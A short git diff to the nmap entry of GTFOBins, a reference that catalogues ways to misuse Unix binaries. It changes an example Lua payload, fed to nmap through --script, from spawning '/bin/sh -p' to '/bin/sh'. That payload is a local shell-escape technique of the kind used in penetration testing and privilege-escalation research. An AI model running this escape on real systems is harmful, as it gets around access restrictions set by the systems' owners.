diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 33ad03a..1eadeb1 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -86,6 +86,6 @@ functions: - description: Input echo is disabled. code: | TF=$(mktemp) - echo 'os.execute("/bin/sh -p")' > $TF + echo 'os.execute("/bin/sh")' > $TF ./nmap --script=$TF ---